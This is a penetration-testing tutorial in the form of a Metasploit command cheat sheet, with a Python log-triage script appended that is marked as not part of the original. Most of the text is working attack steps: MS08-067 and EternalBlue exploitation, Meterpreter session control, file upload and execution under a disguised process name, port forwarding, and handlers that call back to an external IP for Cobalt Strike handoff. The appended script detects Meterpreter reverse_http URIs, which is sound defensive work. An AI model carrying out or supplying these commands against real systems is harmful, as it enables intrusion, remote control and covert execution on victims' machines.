Penetration Testing Tutorial: Kali MSF
Source: admin
Published: 2022-08-19 11:48:52
# First use:
service postgresql start # start the database service
msfdb init # initialise the Metasploit database
# Subsequent use:
msfconsole # start Metasploit
# show the help options
help
# search - look up the module for a vulnerability:
search ms08_067
# use - select the exploit module:
use exploit/windows/smb/ms08_067_netapi
# show - list the target OS versions the module supports (targets):
show targets
# set - set the target parameter (xx is the index matching the target machine's version):
set target xx
# set - set the rhost parameter (the target machine's IP address):
set rhost 192.168.xxx.xxx
# show - review the module options:
show options
# launch the exploit:
exploit
On an internal network the reverse shell can connect straight back to this machine's IP. Across the Internet, when port forwarding is in use, the callback IP is the external IP and the callback port is the external port.
# check whether the host is affected by MS17-010
use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 192.168.148.137
# set the payload and so on
set lhost 192.168.148.134
set lport 4444
run
# keep the session from expiring
set SessionExpirationTimeout 0
# list the sessions
sessions -l
# interact with one session
sessions -i id
# run a command on every session
sessions -c cmd
# run a Meterpreter command on every session
sessions -C "meterpreter_cmd"
# return from the selected session to the console
background
# exit, which also closes every Meterpreter session
exit
# module directories (which one applies depends on how Metasploit was installed):
/usr/share/metasploit-framework/modules/exploits/windows/smb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb
# reload the modules after adding or editing one
reload_all
reload
use exploit/windows/smb/eternalblue_doublepulsar
show options
# this module runs through wine; confirm wine is installed
wine -h
set processinject explorer.exe
# upload a local file to c:\ls\ on the target
upload 1.exe c:\\ls\\
# download a file from the target
download c:\\ls\\1.exe
execute -H -i -f cmd.exe
execute -H -m -d notepad.exe -f 1.exe -a "-o 2.txt"
# -d  process name shown on the target while it runs (used as a disguise)
# -m  execute directly from memory
# -a "-o 2.txt"  the arguments passed to 1.exe
# port forwarding: listen on local port yyyy and forward it to port zzzz on the target
portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx
# check whether the given port is open
netstat -an | grep "yyyy"
[-] Error running command upload: Rex::TimeoutError Operation timed out.
The most important part is the modules directory: it holds the individual modules, which can be invoked and can call one another.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Module skeleton: every exploit module is a class named MetasploitModule
# that inherits from the matching Msf::Exploit base class.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
      'Description'    => %q{
        Say something that the user might need to know
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Name' ],
      'References'     =>
        [
          [ 'URL', '' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'System or software version',
            {
              'Ret' => 0x41414141 # This will be available in `target.ret`
            }
          ]
        ],
      'Payload'        => {
        'BadChars' => "\x00"
      },
      'Arch'           => ARCH_ARMLE,
      'Privileged'     => false,
      'DisclosureDate' => "",
      'DefaultTarget'  => 0))
  end

  def check
    # For the check command: return one of the Exploit::CheckCode values
  end

  def exploit
    # Main function
  end
end
# save the module under the modules tree, then reload:
/opt/metasploit-framework/embedded/framework/modules/exploits/xxx (the folder name you chose)/xxx.rb (your file)
reload_all
reload
# msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http # (note: HTTP, not TCP; I could not find an outbound TCP option in CS 4.2)
set lhost 103.234.72.5
set lport 10086
show options
exploit
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 103.234.72.5 # the CS host address
set LPORT 84 # listening port of your choice; it must match the CS listener
set session 2 # the Meterpreter session to inject from
set DisablePayloadHandler true # do not spawn a new handler
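Both handler blocks above receive their callbacks over windows/meterpreter/reverse_http, whose handler routes each request by an 8-bit checksum of the URI. Added here as an example that is not part of the original post: a Python script that runs that same checksum8 test (byte sum of the base64url characters modulo 256 equal to 92, 80, 88, 95 or 98, the values Metasploit's UriChecksum mixin defines) over constructed proxy log lines so a defender can triage which requests look like Meterpreter stager or session traffic. The log format and sample lines are constructed, and the match is a heuristic that fires on roughly 2% of random paths, so it is a triage signal to combine with other context such as beacon timing.

```python
import re

# 8-bit checksum values Metasploit's reverse_http(s) handler assigns to request
# URIs in order to route them (Rex::Payloads::Meterpreter::UriChecksum).
URI_CHECKSUM_MODES = {
    92: "INITW/INITN (new staged Windows or native session)",
    80: "INITP (new staged Python session)",
    88: "INITJ (new staged Java session)",
    95: "INIT_CONN (new stageless session)",
    98: "CONN (existing session)",
}

# Constructed proxy log lines (client method path status UA); the two opaque paths were built to have checksum8 92 and 98.
SAMPLE_LOG = """\
10.0.0.5 GET /index.html 200 Mozilla/5.0
10.0.0.5 GET /api/v1/users 200 Mozilla/5.0
10.0.0.7 GET /kWdLpQ9xA7 200 Mozilla/5.0
10.0.0.7 POST /Tq8mZ2l 200 Mozilla/5.0
10.0.0.9 GET /favicon.ico 404 Mozilla/5.0
"""

LOG_RE = re.compile(r"^(\S+) (GET|POST) (\S+) (\d{3}) (.*)$")

def checksum8(s: str) -> int:
    """Same calculation as Rex::Text.checksum8: sum of bytes modulo 256."""
    return sum(s.encode()) % 256

def classify_uri(path: str):
    """Return the handler mode name if the path's checksum8 matches one, else None."""
    # The handler first drops every character outside the base64url alphabet.
    bare = re.sub(r"[^A-Za-z0-9_\-]", "", path)
    # Heuristic to cut false positives (about 5 in 256 random strings match):
    # handler URIs are a single opaque segment with no file extension.
    if "/" in path.strip("/") or "." in path or len(bare) < 4:
        return None
    return URI_CHECKSUM_MODES.get(checksum8(bare))

def scan_log(text: str) -> list:
    """Return one record per log line whose path looks like a Meterpreter URI."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status, _ua = m.groups()
        mode = classify_uri(path)
        if mode:
            hits.append({"client": client, "path": path, "mode": mode})
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags only the two opaque paths from 10.0.0.7 and names the handler mode each one would be routed to.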
CS + MSF summary